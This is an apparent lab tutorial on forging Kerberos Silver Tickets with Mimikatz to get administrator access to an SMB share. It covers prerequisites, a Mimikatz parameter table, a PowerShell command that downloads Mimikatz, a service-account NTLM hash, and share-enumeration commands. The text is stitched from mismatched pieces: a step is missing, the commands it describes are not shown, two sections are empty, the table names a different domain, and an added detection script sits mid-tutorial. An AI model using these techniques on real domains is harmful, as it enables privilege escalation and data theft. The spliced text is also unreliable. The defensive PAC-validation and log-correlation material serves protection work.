A Silver Ticket is a forged Ticket Granting Service (TGS) ticket. Unlike a Golden Ticket (which is a TGT signed by the krbtgt hash), a Silver Ticket is signed and encrypted using the hash of a service account (such as HOST, CIFS, HTTP, etc.).
Key Characteristics
Signed using the service account hash (e.g., the machine account of the server offering the service).
Valid only for the specific service (not valid for Kerberos authentication in general like a TGT).
Most services do not validate the PAC (Privilege Attribute Certificate), so a forged TGS is often accepted.
No contact with a Domain Controller is needed to use a Silver Ticket: it can be forged offline, which makes it stealthier.
Silver Tickets can be used for long-term persistence, especially when targeting services tied to computer accounts (valid for 30 days by default).
To forge a Silver Ticket we need the following:
Domain name
Domain SID
SPN of the service to attack
NTLM hash of the service account to attack
PAC (Privilege Attribute Certificate) validation disabled on the target service
Differences between Golden and Silver tickets
Golden ticket requires NTLM hash of the KRBTGT account, while Silver ticket requires NTLM hash of a service account
Silver ticket can be forged offline without prior communication with the KDC/AS.
Attack Workflow
Attacker obtains NTLM password hash of a service account
Using the NTLM hash, a malicious TGS is created, bypassing normal Kerberos flow
Using the forged ticket it becomes possible to authenticate to the service.
1 - Leak NTLM hash of a service account
Mimikatz
Download and extract Mimikatz:
and run it to leak the NTLM hash of the machine account:
Alternatively, if we already have access to a machine (e.g. a reverse shell), we can obtain the domain SID by running whoami /user and dropping the last 4 characters (the RID, e.g. -500): S-1-5-21-1954621190-1971745961-1283776715
3 - Forge the Silver ticket
At this point we have all the information needed to forge the Silver Ticket.
Let's assume we have low-privileged access to a workstation joined to the domain; in my case I log in as dev-angelist\devan.
Consider also that there is an SMB share at corp-dc.dev-angelist.lab/SharedFiles containing a file named secrets.txt, which we are not able to access:
Let's download Mimikatz on devan's machine and generate a Silver Ticket that gives us access to the shared folder with administrative rights:
Download and extract Mimikatz:
Generate the Silver Ticket (kerberos::golden is also used for Silver Tickets); the command below contains all the required values:
NTLM hash of the machine account -> 11bc07660f7c9a2d8f7cead855b8c72b
Service name -> Cifs
id -> 500 (the Administrator RID)
Exit Mimikatz and check the ticket using klist:
Add the DC host entry 192.168.57.9 corp-dc.dev-angelist.lab corp-dc to the hosts file (open Notepad as administrator):
Now we can retry accessing SharedFiles and see the secret.txt file:
Using Safetykatz
It is possible to forge TGS tickets for other services as well (e.g. HOST, RPCSS, HTTP, etc.) as long as you have the corresponding service account hash.
Parameters Explained (Mimikatz Syntax)
Option                                        Description
============================================  =====================================================================
kerberos::golden                              Mimikatz module used to forge the ticket. There is no silver
                                              module: a Silver Ticket is technically a forged TGS.
/user:Administrator                           The user to impersonate.
/domain:dollarcorp.moneycorp.local            FQDN of the target domain.
/sid:S-1-5-21-...                             SID of the domain.
/target:dcorp-dc.dollarcorp.moneycorp.local   FQDN of the target server hosting the service.
/service:CIFS                                 Service Principal Name (SPN) to forge the TGS for.
/rc4:<hash> or /aes256:<key>                  Hash or AES key of the service account.
/id, /groups                                  Optional: RID and group IDs of the user.
/startoffset:0                                When the ticket becomes valid (in minutes from now; 0 = now).
                                              Use a negative value for backdating.
/endin:600                                    Ticket lifetime in minutes (default = 600 mins = 10 hours).
/renewmax:10080                               Maximum renewable lifetime in minutes (default = 7 days).
/ptt                                          Inject the ticket into the current process. No need to write to disk.
Using Rubeus
To protect against these attacks:
Enable PAC validation with the domain controller, since the PAC is a critical section of a Kerberos ticket that carries information about the requesting user (user SID, group membership, user rights and privileges, and authorization data).
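The "no contact with a Domain Controller" property noted above also gives defenders a detection handle: a forged TGS is presented straight to the service, so the host logs a Kerberos network logon for which the DC never logged a matching TGS request. The following is an added example, not code from the original post; the event records are constructed and the field names are an assumption that mirrors the Windows event data names.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Field names mirror the Windows
# event data names; that layout is an assumption about the log collector.
DC_EVENTS = [  # Event 4769 on the DC: a service ticket was requested
    {"time": "2024-05-01T09:00:05", "event_id": 4769, "ServiceName": "CORP-DC$",
     "TargetUserName": "devan@DEV-ANGELIST.LAB", "IpAddress": "192.168.57.20"},
]
SERVER_EVENTS = [  # Event 4624 on the host serving the CIFS share
    {"time": "2024-05-01T09:00:07", "event_id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "devan",
     "IpAddress": "192.168.57.20"},
    # Kerberos network logon as Administrator with no TGS request at the DC
    {"time": "2024-05-01T09:12:40", "event_id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "Administrator",
     "IpAddress": "192.168.57.20"},
]


def find_unrequested_kerberos_logons(server_events, dc_events, service_account,
                                     window=timedelta(hours=10)):
    """Return Kerberos network logons (4624, type 3) on the service host for
    which the DC holds no 4769 for the same user and service account within
    `window` (10 h = the default /endin lifetime used when forging).
    A hit is a lead, not proof: a gap in DC log collection or a ticket
    requested before the window also produces one, so triage before acting."""
    tgs = [e for e in dc_events if e["event_id"] == 4769
           and e["ServiceName"].upper() == service_account.upper()]
    hits = []
    for e in server_events:
        if (e["event_id"] != 4624 or e["LogonType"] != 3
                or e["AuthenticationPackageName"] != "Kerberos"):
            continue
        logon_time = datetime.fromisoformat(e["time"])
        user = e["TargetUserName"].lower()
        requested = any(
            r["TargetUserName"].split("@")[0].lower() == user
            and timedelta(0) <= logon_time - datetime.fromisoformat(r["time"]) <= window
            for r in tgs)
        if not requested:
            hits.append(e)
    return hits


if __name__ == "__main__":
    for h in find_unrequested_kerberos_logons(SERVER_EVENTS, DC_EVENTS, "CORP-DC$"):
        print(f"{h['time']}: Kerberos logon as {h['TargetUserName']} "
              f"with no TGS request seen at the DC")
```

Run against real data, the DC side needs 4769 auditing enabled and forwarded; without it every Kerberos logon on the host shows up as a hit.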
Output of whoami /user used to read the domain SID:
User Name                  SID
========================== =============================================
dev-angelist\administrator S-1-5-21-1954621190-1971745961-1283776715-500

Checking the current user, host and access to the share from devan's workstation:
whoami
hostname
dir \\corp-dc.dev-angelist.lab\SharedFiles

Downloading and extracting Mimikatz (PowerShell):
iwr -uri https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mimikatz_trunk.zip
Expand-Archive -Path 'mimikatz_trunk.zip'
cd .\mimikatz_trunk\
# Win32 folder in this case, because this machine is 32-bit